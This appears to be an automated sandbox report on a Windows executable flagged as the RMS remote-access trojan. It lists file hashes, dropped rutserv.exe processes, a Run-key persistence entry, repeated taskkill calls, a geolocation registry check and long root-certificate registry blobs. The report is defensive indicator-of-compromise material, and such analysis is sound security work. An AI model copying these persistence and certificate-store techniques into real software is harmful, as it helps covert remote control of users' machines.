rms | 5903ca7c770eb447d3d83e9dbc28469b172d74a4e9fb552db6c41db8e96db330

Analysis

max time kernel
148s
max time network
152s
platform
windows10_x64
resource
win10v20210410
submitted
06-07-2021 20:22

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

5903CA7C770EB447D3D83E9DBC28469B172D74A4E9FB5.exe
Size

6.8MB
MD5

82f18d250b9262253e3f358b26d8888b
SHA1

94412e471583266dd4b89daea0e2ca4238c0ac95
SHA256

5903ca7c770eb447d3d83e9dbc28469b172d74a4e9fb552db6c41db8e96db330
SHA512

c17abb82c904735a845dd50ee5a48b5cbc14526eeedc9de07cef72ac3b78d6fe00abf3f65521ae1048a2d4ffbd64f62e0703ee61ccc08059625bae15d939c4a6

Score

10^/10

rms persistence rat trojan

Malware Config

Signatures

RMS
Remote Manipulator System (RMS) is a remote access tool developed by Russian organization TektonIT.
trojan rat rms
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs

Processes:

svchost.exe

description pid process target process

PID 1644 created 2948 1644 svchost.exe rutserv.exe
Executes dropped EXE 3 IoCs

Processes:

5903CA7C770EB447D3D83E9DBC28469B172D74A4E9FB5.tmprutserv.exerutserv.exe

pid process

2644 5903CA7C770EB447D3D83E9DBC28469B172D74A4E9FB5.tmp
2948 rutserv.exe
2388 rutserv.exe
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.

Query Registry
T1012

System Information Discovery
T1082

Processes:

rutserv.exe

description ioc process

Key value queried \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Control Panel\International\Geo\Nation rutserv.exe
Loads dropped DLL 4 IoCs

Processes:

rutserv.exerutserv.exe

pid process

2948 rutserv.exe
2948 rutserv.exe
2388 rutserv.exe
2388 rutserv.exe

description	pid	process	target process
PID 1644 created 2948	1644	svchost.exe	rutserv.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Control Panel\International\Geo\Nation	rutserv.exe

pid	process
2948	rutserv.exe
2948	rutserv.exe
2388	rutserv.exe
2388	rutserv.exe

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

reg.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Windows\CurrentVersion\Run	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Windows\CurrentVersion\Run\serv = "C:\\ProgramData\\Immunity\\rutserv.exe"	reg.exe

Drops file in System32 directory 14 IoCs

Processes:

rutserv.exe

description	ioc	process
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\378B079587A9184B2E2AB859CB263F40_524AD1B9B08D3C6450727265AE77B7D2	rutserv.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData	rutserv.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content	rutserv.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\8EB35376744F392396307460D546222D_EC1C46868A78521D3A7ED5209EF9CB19	rutserv.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\C86BD7751D53F10F65AAAD66BBDF33C7	rutserv.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft	rutserv.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157	rutserv.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506	rutserv.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\378B079587A9184B2E2AB859CB263F40_524AD1B9B08D3C6450727265AE77B7D2	rutserv.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\8EB35376744F392396307460D546222D_EC1C46868A78521D3A7ED5209EF9CB19	rutserv.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache	rutserv.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506	rutserv.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\C86BD7751D53F10F65AAAD66BBDF33C7	rutserv.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\57C8EDB95DF3F0AD4EE2DC2B8CFD4157	rutserv.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Delays execution with timeout.exe 1 IoCs
evasion

Processes:

timeout.exe

pid process

2452 timeout.exe

pid	process
2452	timeout.exe

Kills process with taskkill 64 IoCs

evasion

Processes:

taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exe

pid	process
1560	taskkill.exe
1524	taskkill.exe
1236	taskkill.exe
3936	taskkill.exe
1096	taskkill.exe
1524	taskkill.exe
3904	taskkill.exe
1156	taskkill.exe
660	taskkill.exe
3520	taskkill.exe
3168	taskkill.exe
3040	taskkill.exe
4012	taskkill.exe
1832	taskkill.exe
1468	taskkill.exe
3040	taskkill.exe
1156	taskkill.exe
1156	taskkill.exe
3040	taskkill.exe
1236	taskkill.exe
3168	taskkill.exe
3712	taskkill.exe
296	taskkill.exe
2452	taskkill.exe
1420	taskkill.exe
3980	taskkill.exe
3912	taskkill.exe
1156	taskkill.exe
1468	taskkill.exe
1972	taskkill.exe
2144	taskkill.exe
1832	taskkill.exe
4076	taskkill.exe
3936	taskkill.exe
1832	taskkill.exe
660	taskkill.exe
1560	taskkill.exe
2128	taskkill.exe
640	taskkill.exe
1508	taskkill.exe
1560	taskkill.exe
1560	taskkill.exe
1252	taskkill.exe
4012	taskkill.exe
4012	taskkill.exe
4012	taskkill.exe
4024	taskkill.exe
4044	taskkill.exe
4068	taskkill.exe
4068	taskkill.exe
1796	taskkill.exe
660	taskkill.exe
3488	taskkill.exe
1972	taskkill.exe
1468	taskkill.exe
1424	taskkill.exe
1424	taskkill.exe
1508	taskkill.exe
4044	taskkill.exe
3168	taskkill.exe
1524	taskkill.exe
1468	taskkill.exe
1236	taskkill.exe
1236	taskkill.exe

Modifies data under HKEY_USERS 45 IoCs

Processes:

rutserv.exe

description	ioc	process
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	rutserv.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	rutserv.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	rutserv.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	rutserv.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	rutserv.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	rutserv.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	rutserv.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	rutserv.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	rutserv.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	rutserv.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	rutserv.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	rutserv.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	rutserv.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000	rutserv.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	rutserv.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	rutserv.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	rutserv.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	rutserv.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	rutserv.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\OnDemandInterfaceCache	rutserv.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	rutserv.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	rutserv.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	rutserv.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	rutserv.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	rutserv.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	rutserv.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	rutserv.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\My	rutserv.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	rutserv.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	rutserv.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	rutserv.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	rutserv.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	rutserv.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@C:\Windows\SysWOW64\FirewallControlPanel.dll,-12122 = "Windows Firewall"	rutserv.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	rutserv.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	rutserv.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	rutserv.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	rutserv.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	rutserv.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	rutserv.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	rutserv.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	rutserv.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	rutserv.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	rutserv.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	rutserv.exe

Modifies system certificate store 2 TTPs 10 IoCs

evasion spyware trojan

Install Root Certificate

T1130

Modify Registry

T1112

Processes:

rutserv.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\91C6D6EE3E8AC86384E548C299295C756C817B81	rutserv.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\91C6D6EE3E8AC86384E548C299295C756C817B81\Blob = 0f000000010000001400000085fef11b4f47fe3952f98301c9f98976fefee0ce7f000000010000002a000000302806082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030109000000010000002a000000302806082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030153000000010000002500000030233021060b6086480186f8450107300130123010060a2b0601040182373c0101030200c06200000001000000200000008d722f81a9c113c0791df136a2966db26c950a971db46b4199f4ea54b78bfb9f1400000001000000140000007b5b45cfafcecb7afd31921a6ab6f346eb5748501d00000001000000100000005b3b67000eeb80022e42605b6b3b72400b000000010000000e00000074006800610077007400650000007e000000010000000800000000c0032f2df8d60103000000010000001400000091c6d6ee3e8ac86384e548c299295c756c817b812000000001000000240400003082042030820308a0030201020210344ed55720d5edec49f42fce37db2b6d300d06092a864886f70d01010505003081a9310b300906035504061302555331153013060355040a130c7468617774652c20496e632e31283026060355040b131f43657274696669636174696f6e205365727669636573204469766973696f6e31383036060355040b132f2863292032303036207468617774652c20496e632e202d20466f7220617574686f72697a656420757365206f6e6c79311f301d06035504031316746861777465205072696d61727920526f6f74204341301e170d3036313131373030303030305a170d3336303731363233353935395a3081a9310b300906035504061302555331153013060355040a130c7468617774652c20496e632e31283026060355040b131f43657274696669636174696f6e205365727669636573204469766973696f6e31383036060355040b132f2863292032303036207468617774652c20496e632e202d20466f7220617574686f72697a656420757365206f6e6c79311f301d06035504031316746861777465205072696d61727920526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100aca0f0fb8059d49cc7a4cf9da159730910450c0d2c6e68f16c5b4868495937fc0b3319c2777fcc102d95341ce6eb4d09a71cd2b8c9973602b789d4245f06c0cc4494948d02626feb5add118d289a5c8490107a0dbd74662f6a38a0e2d55444eb1d079f07ba6feee9fd4e0b29f53e84a001f19cabf81c7e89a4e8a1d871650da3517beebcd222600db95b9ddfbafc515b0baf98b2e92ee904e86287de2bc8d74ec14c641eddcf8758ba4a4fca68071d1c9d4ac6d52f91cc7c71721cc5c067eb32fdc9925c94da85c09bbf537d2b09f48c9d911f976a52cbde0936a477d87b875044d53e6e2969fb3949261e09a5807b402debe82785c9fe61fd7ee67c971dd59d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e041604147b5b45cfafcecb7afd31921a6ab6f346eb574850300d06092a864886f70d010105050003820101007911c04bb391b6fcf0e967d40d6e45be55e893d2ce033fedda25b01d57cb1e3a76a04cec5076e864720ca4a9f1b88bd6d68784bb32e54111c077d9b3609deb1bd5d16e4444a9a601ec55621d77b85c8e48497c9c3b5711acad73378e2f785c906847d96060e6fc073d222017c4f716e9c4d872f9c8737cdf162f15a93efd6a27b6a1eb5aba981fd5e34d640a9d13c861baf5391c87bab8bd7b227ff6feac4079e5ac106f3d8f1b79768bc437b3211884e53600eb632099b9e9fe3304bb41c8c102f94463209e81ce42d3d63f2c76d3639c59dd8fa6e10ea02e41f72e9547cfbcfd33f3f60b617e7e912b8147c22730eea7105d378f5c392be404f07b8d568c68	rutserv.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\91C6D6EE3E8AC86384E548C299295C756C817B81\Blob = 0400000001000000100000008ccadc0b22cef5be72ac411a11a8d81203000000010000001400000091c6d6ee3e8ac86384e548c299295c756c817b817e000000010000000800000000c0032f2df8d6010b000000010000000e00000074006800610077007400650000001d00000001000000100000005b3b67000eeb80022e42605b6b3b72401400000001000000140000007b5b45cfafcecb7afd31921a6ab6f346eb5748506200000001000000200000008d722f81a9c113c0791df136a2966db26c950a971db46b4199f4ea54b78bfb9f53000000010000002500000030233021060b6086480186f8450107300130123010060a2b0601040182373c0101030200c009000000010000002a000000302806082b0601050507030206082b0601050507030306082b0601050507030406082b060105050703017f000000010000002a000000302806082b0601050507030206082b0601050507030306082b0601050507030406082b060105050703010f000000010000001400000085fef11b4f47fe3952f98301c9f98976fefee0ce2000000001000000240400003082042030820308a0030201020210344ed55720d5edec49f42fce37db2b6d300d06092a864886f70d01010505003081a9310b300906035504061302555331153013060355040a130c7468617774652c20496e632e31283026060355040b131f43657274696669636174696f6e205365727669636573204469766973696f6e31383036060355040b132f2863292032303036207468617774652c20496e632e202d20466f7220617574686f72697a656420757365206f6e6c79311f301d06035504031316746861777465205072696d61727920526f6f74204341301e170d3036313131373030303030305a170d3336303731363233353935395a3081a9310b300906035504061302555331153013060355040a130c7468617774652c20496e632e31283026060355040b131f43657274696669636174696f6e205365727669636573204469766973696f6e31383036060355040b132f2863292032303036207468617774652c20496e632e202d20466f7220617574686f72697a656420757365206f6e6c79311f301d06035504031316746861777465205072696d61727920526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100aca0f0fb8059d49cc7a4cf9da159730910450c0d2c6e68f16c5b4868495937fc0b3319c2777fcc102d95341ce6eb4d09a71cd2b8c9973602b789d4245f06c0cc4494948d02626feb5add118d289a5c8490107a0dbd74662f6a38a0e2d55444eb1d079f07ba6feee9fd4e0b29f53e84a001f19cabf81c7e89a4e8a1d871650da3517beebcd222600db95b9ddfbafc515b0baf98b2e92ee904e86287de2bc8d74ec14c641eddcf8758ba4a4fca68071d1c9d4ac6d52f91cc7c71721cc5c067eb32fdc9925c94da85c09bbf537d2b09f48c9d911f976a52cbde0936a477d87b875044d53e6e2969fb3949261e09a5807b402debe82785c9fe61fd7ee67c971dd59d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e041604147b5b45cfafcecb7afd31921a6ab6f346eb574850300d06092a864886f70d010105050003820101007911c04bb391b6fcf0e967d40d6e45be55e893d2ce033fedda25b01d57cb1e3a76a04cec5076e864720ca4a9f1b88bd6d68784bb32e54111c077d9b3609deb1bd5d16e4444a9a601ec55621d77b85c8e48497c9c3b5711acad73378e2f785c906847d96060e6fc073d222017c4f716e9c4d872f9c8737cdf162f15a93efd6a27b6a1eb5aba981fd5e34d640a9d13c861baf5391c87bab8bd7b227ff6feac4079e5ac106f3d8f1b79768bc437b3211884e53600eb632099b9e9fe3304bb41c8c102f94463209e81ce42d3d63f2c76d3639c59dd8fa6e10ea02e41f72e9547cfbcfd33f3f60b617e7e912b8147c22730eea7105d378f5c392be404f07b8d568c68	rutserv.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43	rutserv.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 0f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa6530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703086200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c14000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f0b00000001000000120000004400690067006900430065007200740000001d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d432000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2	rutserv.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 04000000010000001000000087ce0b7b2a0e4900e158719b37a893720300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d431d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0b000000010000001200000044006900670069004300650072007400000014000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f6200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa62000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2	rutserv.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\91C6D6EE3E8AC86384E548C299295C756C817B81\Blob = 190000000100000010000000dc73f9b71e16d51d26527d32b11a6a3d0f000000010000001400000085fef11b4f47fe3952f98301c9f98976fefee0ce7f000000010000002a000000302806082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030109000000010000002a000000302806082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030153000000010000002500000030233021060b6086480186f8450107300130123010060a2b0601040182373c0101030200c06200000001000000200000008d722f81a9c113c0791df136a2966db26c950a971db46b4199f4ea54b78bfb9f1400000001000000140000007b5b45cfafcecb7afd31921a6ab6f346eb5748501d00000001000000100000005b3b67000eeb80022e42605b6b3b72400b000000010000000e00000074006800610077007400650000007e000000010000000800000000c0032f2df8d60103000000010000001400000091c6d6ee3e8ac86384e548c299295c756c817b810400000001000000100000008ccadc0b22cef5be72ac411a11a8d8122000000001000000240400003082042030820308a0030201020210344ed55720d5edec49f42fce37db2b6d300d06092a864886f70d01010505003081a9310b300906035504061302555331153013060355040a130c7468617774652c20496e632e31283026060355040b131f43657274696669636174696f6e205365727669636573204469766973696f6e31383036060355040b132f2863292032303036207468617774652c20496e632e202d20466f7220617574686f72697a656420757365206f6e6c79311f301d06035504031316746861777465205072696d61727920526f6f74204341301e170d3036313131373030303030305a170d3336303731363233353935395a3081a9310b300906035504061302555331153013060355040a130c7468617774652c20496e632e31283026060355040b131f43657274696669636174696f6e205365727669636573204469766973696f6e31383036060355040b132f2863292032303036207468617774652c20496e632e202d20466f7220617574686f72697a656420757365206f6e6c79311f301d06035504031316746861777465205072696d61727920526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100aca0f0fb8059d49cc7a4cf9da159730910450c0d2c6e68f16c5b4868495937fc0b3319c2777fcc102d95341ce6eb4d09a71cd2b8c9973602b789d4245f06c0cc4494948d02626feb5add118d289a5c8490107a0dbd74662f6a38a0e2d55444eb1d079f07ba6feee9fd4e0b29f53e84a001f19cabf81c7e89a4e8a1d871650da3517beebcd222600db95b9ddfbafc515b0baf98b2e92ee904e86287de2bc8d74ec14c641eddcf8758ba4a4fca68071d1c9d4ac6d52f91cc7c71721cc5c067eb32fdc9925c94da85c09bbf537d2b09f48c9d911f976a52cbde0936a477d87b875044d53e6e2969fb3949261e09a5807b402debe82785c9fe61fd7ee67c971dd59d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e041604147b5b45cfafcecb7afd31921a6ab6f346eb574850300d06092a864886f70d010105050003820101007911c04bb391b6fcf0e967d40d6e45be55e893d2ce033fedda25b01d57cb1e3a76a04cec5076e864720ca4a9f1b88bd6d68784bb32e54111c077d9b3609deb1bd5d16e4444a9a601ec55621d77b85c8e48497c9c3b5711acad73378e2f785c906847d96060e6fc073d222017c4f716e9c4d872f9c8737cdf162f15a93efd6a27b6a1eb5aba981fd5e34d640a9d13c861baf5391c87bab8bd7b227ff6feac4079e5ac106f3d8f1b79768bc437b3211884e53600eb632099b9e9fe3304bb41c8c102f94463209e81ce42d3d63f2c76d3639c59dd8fa6e10ea02e41f72e9547cfbcfd33f3f60b617e7e912b8147c22730eea7105d378f5c392be404f07b8d568c68	rutserv.exe
